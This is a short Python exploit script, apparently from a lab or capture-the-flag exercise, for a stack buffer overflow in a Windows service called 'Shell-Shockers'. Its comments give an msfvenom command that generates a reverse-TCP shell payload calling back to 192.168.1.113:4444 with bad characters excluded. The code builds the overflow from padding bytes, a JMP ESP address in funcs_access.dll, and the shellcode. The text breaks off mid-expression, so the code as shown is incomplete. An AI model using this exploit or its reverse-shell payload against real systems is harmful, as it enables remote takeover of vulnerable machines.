#!/usr/bin/python3 # -*- coding: utf-8 -*- # exploit.py - Shell-Shockers BOF Exploit # 前提: 先运行 msfvenom 生成 /tmp/sc_final.py # # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.113 LPORT=4444 \ # -b '\x00\x4d\x4f\x5f\x79\x7e\x7f' \ # -f py EXITFUNC=thread > /tmp/sc_final.py 2>/dev/null import socket import struct import sys sys.path.insert(0, '/tmp') from sc_final import buf as shellcode JMP_ESP = 0x625012d0 # funcs_access.dll - jmp esp (无坏字符!) # Layout: [1902 A's] [JMP ESP] [shellcode] payload = b'A' * 1902 payload += struct.pack(' {struct.pack("